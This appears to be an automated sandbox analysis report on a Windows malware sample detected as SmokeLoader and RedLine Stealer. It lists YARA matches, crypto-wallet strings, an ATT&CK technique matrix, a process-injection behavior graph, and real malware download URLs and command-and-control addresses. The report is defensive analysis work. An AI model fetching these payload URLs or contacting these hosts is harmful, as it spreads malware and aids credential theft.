                      Source: explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373972184.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.383787188.00000000083E9000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396181153.00000000083E9000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000005.00000000.372574015.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.389389108.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403537957.00000000008B8000.00000004.00000020.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DB56.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DB56.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: DB56.exe, 00000012.00000002.622325336.0000000001046000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 23.2.4924.exe.21e6516.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2610000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440ee8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.21e562e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.4924.exe.6a4528.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.21e562e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.DB56.exe.3e84c30.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.DB56.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.21e6516.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440ee8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.DB56.exe.3e84c30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.4924.exe.6a4528.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2610000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.523427669.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.522921861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.524651517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.578493613.00000000006A4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.524218924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DB56.exe PID: 3496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DB56.exe PID: 4272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4924.exe PID: 6316, type: MEMORYSTR
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.fw8ex1BNek.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fw8ex1BNek.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.acgvitw.630e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.acgvitw.640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.fw8ex1BNek.exe.640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.acgvitw.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: ElectrumE#
                      Source: DB56.exeString found in binary or memory: Y2Kk37O/WKAGtjb5HPg3kTSKGyi3Ne9K0dYz2mIiUDEtQ3a57xnmJAXxAx4SIyXYjnpCTZIvModiocW4XNebcAphSLesdCH4NZBUKTm0ABNvi/NeDHIfaudRy5SDghH3Wo
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmpString found in binary or memory: ExodusE#
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: EthereumE#
                      Source: DB56.exeString found in binary or memory: set_UseMachineKeyStore
                      Source: Yara matchFile source: Process Memory Space: DB56.exe PID: 4272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4924.exe PID: 6316, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 23.2.4924.exe.21e6516.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2610000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440ee8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.21e562e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.4924.exe.6a4528.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.21e562e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.DB56.exe.3e84c30.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.DB56.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.21e6516.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.DB56.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440ee8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2440000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.DB56.exe.3e84c30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.4924.exe.6a4528.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.4924.exe.2610000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.523427669.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.522921861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.524651517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.578493613.00000000006A4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.524218924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DB56.exe PID: 3496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DB56.exe PID: 4272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4924.exe PID: 6316, type: MEMORYSTR
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.fw8ex1BNek.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fw8ex1BNek.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.acgvitw.630e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.acgvitw.640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.fw8ex1BNek.exe.640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.acgvitw.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture1File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection412Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery113Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery531SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing32NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion231SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol125Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion231/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection412Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 542025 Sample: fw8ex1BNek.exe Startdate: 18/12/2021 Architecture: WINDOWS Score: 100 51 Multi AV Scanner detection for domain / URL 2->51 53 Found malware configuration 2->53 55 Antivirus detection for URL or domain 2->55 57 11 other signatures 2->57 8 fw8ex1BNek.exe 2->8         started        11 acgvitw 2->11         started        process3 signatures4 71 Detected unpacking (changes PE section rights) 8->71 73 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->73 75 Maps a DLL or memory area into another process 8->75 77 Creates a thread in another existing process (thread injection) 8->77 13 explorer.exe 4 8->13 injected 79 Multi AV Scanner detection for dropped file 11->79 81 Machine Learning detection for dropped file 11->81 83 Checks if the current machine is a virtual machine (disk enumeration) 11->83 process5 dnsIp6 45 185.112.83.8, 49882, 80 SUPERSERVERSDATACENTERRU Russian Federation 13->45 47 rcacademy.at 211.59.14.90, 49758, 49849, 49857 SKB-ASSKBroadbandCoLtdKR Korea Republic of 13->47 49 8 other IPs or domains 13->49 35 C:\Users\user\AppData\Roaming\acgvitw, PE32 13->35 dropped 37 C:\Users\user\AppData\Local\Temp\DB56.exe, PE32 13->37 dropped 39 C:\Users\user\AppData\Local\Temp\8CE5.exe, PE32 13->39 dropped 41 2 other malicious files 13->41 dropped 85 System process connects to network (likely due to code injection or exploit) 13->85 87 Benign windows process drops PE files 13->87 89 Deletes itself after installation 13->89 91 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->91 18 DB56.exe 3 13->18         started        22 4924.exe 2 13->22         started        24 8CE5.exe 19 13->24         started        file7 signatures8 process9 file10 29 C:\Users\user\AppData\Local\...\DB56.exe.log, ASCII 18->29 dropped 59 Multi AV Scanner detection for dropped file 18->59 61 Machine Learning detection for dropped file 18->61 63 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->63 65 Injects a PE file into a foreign processes 18->65 26 DB56.exe 4 18->26         started        67 Detected unpacking (changes PE section rights) 22->67 69 Detected unpacking (overwrites its own PE header) 22->69 31 C:\Users\user\AppData\Local\...\System.dll, PE32 24->31 dropped 33 C:\Users\user\AppData\Local\...\Wamozart6.dat, DOS 24->33 dropped signatures11 process12 dnsIp13 43 86.107.197.138, 38133, 49865 MOD-EUNL Romania 26->43

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      fw8ex1BNek.exe39%VirustotalBrowse
                      fw8ex1BNek.exe38%ReversingLabsWin32.Trojan.Jaik
                      fw8ex1BNek.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\DB56.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\acgvitw100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\4924.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\8CE5.exe18%ReversingLabsWin32.Trojan.Shelsy
                      C:\Users\user\AppData\Local\Temp\DB56.exe60%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\Wamozart6.dat0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\nsn7A92.tmp\System.dll3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\nsn7A92.tmp\System.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\acgvitw38%ReversingLabsWin32.Trojan.Jaik

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.3.fw8ex1BNek.exe.640000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.fw8ex1BNek.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.fw8ex1BNek.exe.630e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.3.acgvitw.640000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.acgvitw.630e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.acgvitw.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      bastinscustomfab.com0%VirustotalBrowse
                      rcacademy.at12%VirustotalBrowse
                      www.bastinscustomfab.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://service.r0%URL Reputationsafe
                      http://45.9.20.240:7769/Igno.exe0%VirustotalBrowse
                      http://45.9.20.240:7769/Igno.exe100%Avira URL Cloudmalware
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id90%URL Reputationsafe
                      http://tempuri.org/Entity/Id80%URL Reputationsafe
                      http://tempuri.org/Entity/Id50%URL Reputationsafe
                      http://tempuri.org/Entity/Id40%URL Reputationsafe
                      http://tempuri.org/Entity/Id70%URL Reputationsafe
                      http://e-lanpengeonline.com/upload/0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id60%URL Reputationsafe
                      http://185.112.83.8/InjectHollowing.bin0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      https://bastinscustomfab.com/veldolore/scc.exe0%Avira URL Cloudsafe
                      http://support.a0%URL Reputationsafe
                      http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                      http://185.112.83.8/install3.exe100%Avira URL Cloudmalware
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://galala.ru/upload/100%Avira URL Cloudmalware
                      http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id200%URL Reputationsafe
                      http://tempuri.org/Entity/Id210%URL Reputationsafe
                      http://tempuri.org/Entity/Id220%URL Reputationsafe
                      http://tempuri.org/Entity/Id230%URL Reputationsafe
                      http://tempuri.org/Entity/Id240%URL Reputationsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                      http://witra.ru/upload/100%Avira URL Cloudmalware
                      http://forms.rea0%URL Reputationsafe
                      https://www.bastinscustomfab.com/veldolore/scc.exe0%Avira URL Cloudsafe
                      http://rcacademy.at/upload/0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id100%URL Reputationsafe
                      http://tempuri.org/Entity/Id110%URL Reputationsafe
                      http://tempuri.org/Entity/Id120%URL Reputationsafe
                      http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
